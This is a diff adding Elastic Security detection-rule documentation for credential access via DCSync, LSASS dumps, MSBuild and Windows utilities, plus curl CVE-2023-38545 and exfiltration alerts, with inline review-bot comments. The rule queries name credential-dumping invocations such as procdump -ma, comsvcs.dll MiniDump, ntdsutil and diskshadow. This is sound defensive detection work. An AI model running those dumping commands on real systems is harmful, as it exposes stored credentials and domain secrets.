Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event", "fork", "fork_event") and +event.type == "start" and user.name == "postgres" and ( + (process.parent.args : "*sh" and process.parent.args : "echo*") or + (process.args : "*sh" and process.args : "echo*") +) and not process.parent.name : "puppet" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell 
+** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc new file mode 100644 index 0000000000..c32d741541 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc 
@@ -0,0 +1,150 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-dcsync]] +=== Potential Credential Access via DCSync + +This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html +* https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing +* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml +* https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md +* https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync +* https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Privilege Escalation +* Data Source: Active Directory +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Credential Access via DCSync + +Active Directory replication is the process by which the changes that originate on one 
domain controller are automatically transferred to other domain controllers that store the same data. + +Active Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object. + +Adversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate. + +More details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync). + +This rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that use the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set). 
It also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)). + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not. +- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones). + +### False positive analysis + +- Administrators may use custom accounts on Azure AD Connect, investigate if it is the case, and if it is properly secured. If noisy in your environment due to expected activity, consider adding the corresponding account as a exception. +- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. If this rule is noisy in your environment due to expected activity, consider adding the corresponding account as a exception. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. 
+- If the entire domain or the `krbtgt` user was compromised: + - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user. +- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where event.action == "Directory Service Access" and + event.code == "4662" and winlog.event_data.Properties : ( + + /* Control Access Rights/Permissions Symbol */ + + "*DS-Replication-Get-Changes*", + "*DS-Replication-Get-Changes-All*", + "*DS-Replication-Get-Changes-In-Filtered-Set*", + + /* Identifying GUID used in ACE */ + + "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*", + "*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*", + "*89e95b76-444d-4c62-991a-0facbeda640c*") + + /* The right to perform an operation controlled by an extended access right. 
*/ + + and winlog.event_data.AccessMask : "0x100" and + not winlog.event_data.SubjectUserName : ("*$", "MSOL_*", "OpenDNS_Connector") + + /* The Umbrella AD Connector uses the OpenDNS_Connector account to perform replication */ + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: DCSync +** ID: T1003.006 +** Reference URL: https://attack.mitre.org/techniques/T1003/006/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc new file mode 100644 index 0000000000..6c7b7db93c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc 
@@ -0,0 +1,91 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump]] +=== Potential Credential Access via LSASS Memory Dump + +Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic:Execution +* Data Source: Sysmon Only + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.code == "10" and + winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe" and + + /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/ + winlog.event_data.CallTrace : ("*dbghelp*", "*dbgcore*") and + + /* case of lsass crashing */ + not process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\Windows\\System32\\WerFaultSecure.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** 
Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc new file mode 100644 index 0000000000..954d0b2696 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc 
@@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll]] +=== Potential Credential Access via Renamed COM+ Services DLL + +Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Data Source: Sysmon Only + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m + [process where host.os.type == "windows" and event.category == "process" and + process.name : "rundll32.exe"] + [process where host.os.type == "windows" and event.category == "process" and event.dataset : "windows.sysmon_operational" and event.code == "7" and + (file.pe.original_file_name : "COMSVCS.DLL" or file.pe.imphash : "EADBCCBB324829ACB5F2BBE87E5549A8") and + /* renamed COMSVCS */ + not file.name : "COMSVCS.DLL"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS 
Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc new file mode 100644 index 0000000000..a332b301e2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc 
@@ -0,0 +1,150 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility]] +=== Potential Credential Access via Trusted Developer Utility + +An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Credential Access via Trusted Developer Utility + +The Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software. + +Adversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution. 
+ +This rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the command line to identify the `.csproj` file location. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "windows" and event.type == "start" and (process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe")] + [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : ("vaultcli.dll", "SAMLib.DLL") or file.name : ("vaultcli.dll", "SAMLib.DLL"))] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: 
https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Windows Credential Manager +** ID: T1555.004 +** Reference URL: https://attack.mitre.org/techniques/T1555/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc new file mode 100644 index 0000000000..0312f515d1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc 
@@ -0,0 +1,159 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities]] +=== Potential Credential Access via Windows Utilities + +Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* +* logs-system.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Credential Access via Windows Utilities + +Local Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. + +The `Ntds.dit` file is a database that stores Active Directory data, including information about user objects, groups, and group membership. + +This rule looks for the execution of utilities that can extract credential data from the LSASS memory and Active Directory `Ntds.dit` file. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the command line to identify what information was targeted. +- Identify the target computer and its role in the IT environment. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- If the host is a domain controller (DC): + - Activate your incident response plan for total Active Directory compromise. + - Review the privileges assigned to users that can access the DCs, to ensure that the least privilege principle is being followed and to reduce the attack surface. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and +( + ( + (process.pe.original_file_name : "procdump" or process.name : "procdump.exe") and process.args : "-ma" + ) or + ( + process.name : "ProcessDump.exe" and not process.parent.executable regex~ """C:\\Program Files( \(x86\))?\\Cisco Systems\\.*""" + ) or + ( + (process.pe.original_file_name : "WriteMiniDump.exe" or process.name : "WriteMiniDump.exe") and + not process.parent.executable regex~ """C:\\Program Files( \(x86\))?\\Steam\\.*""" + ) or + ( + (process.pe.original_file_name : "RUNDLL32.EXE" or process.name : "RUNDLL32.exe") and + (process.args : "MiniDump*" or process.command_line : "*comsvcs.dll*#24*") + ) or + ( + (process.pe.original_file_name : "RdrLeakDiag.exe" or process.name : "RdrLeakDiag.exe") and + process.args : "/fullmemdmp" + ) or + ( + (process.pe.original_file_name : "SqlDumper.exe" or process.name : "SqlDumper.exe") and + process.args : "0x01100*") or + ( + (process.pe.original_file_name : "TTTracer.exe" or process.name : "TTTracer.exe") and + process.args : "-dumpFull" and process.args : "-attach") or + ( + (process.pe.original_file_name : "ntdsutil.exe" or process.name : "ntdsutil.exe") and + process.args : "create*full*") or + ( + (process.pe.original_file_name : "diskshadow.exe" or process.name : "diskshadow.exe") and process.args : "/s") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: 
https://attack.mitre.org/techniques/T1003/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc new file mode 100644 index 0000000000..baad9eb5cd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc 
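Review bot: the investigation guide expands LSASS as "Local Security Authority Server Service"; the process is the Local Security Authority Subsystem Service, so that sentence should be corrected before publication. Separately, the `ProcessDump.exe` and `WriteMiniDump.exe` branches of the rule query are excluded solely on a `process.parent.executable` path under `Cisco Systems` or `Steam`; a path match is not by itself a trust decision, so either tighten those exclusions with a parent code-signature condition or document the trade-off in the false positive analysis section, which currently states only that the activity is unlikely to happen legitimately.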
@@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation]] +=== Potential curl CVE-2023-38545 Exploitation + +Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://curl.se/docs/CVE-2023-38545.html +* https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/ +* https://twitter.com/_JohnHammond/status/1711986412554531015 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.name == "curl" +and ( + process.args : ("--socks5-hostname", "--proxy", "--preproxy", "socks5*") or + process.env_vars: ("http_proxy=socks5h://*", "HTTPS_PROXY=socks5h://*", "ALL_PROXY=socks5h://*") +) and length(process.command_line) > 255 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** 
ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc new file mode 100644 index 0000000000..c7e5514ec8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc 
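Review bot: the description directs readers to "the setup guide of this rule" for enabling collection of the `http_proxy`, `HTTPS_PROXY` and `ALL_PROXY` environment variables, but this document has no `==== Setup` section, so the `process.env_vars` branch of the query cannot be acted on from this page; add the setup section or a link to it. Also, "curl version <= 8.3" overstates the affected range: the referenced curl advisory lists libcurl 7.69.0 through 8.3.0 as affected, so "curl versions 7.69.0 through 8.3.0" would be the accurate wording.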
@@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port]] +=== Potential Data Exfiltration Activity to an Unusual Destination Port + +A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git 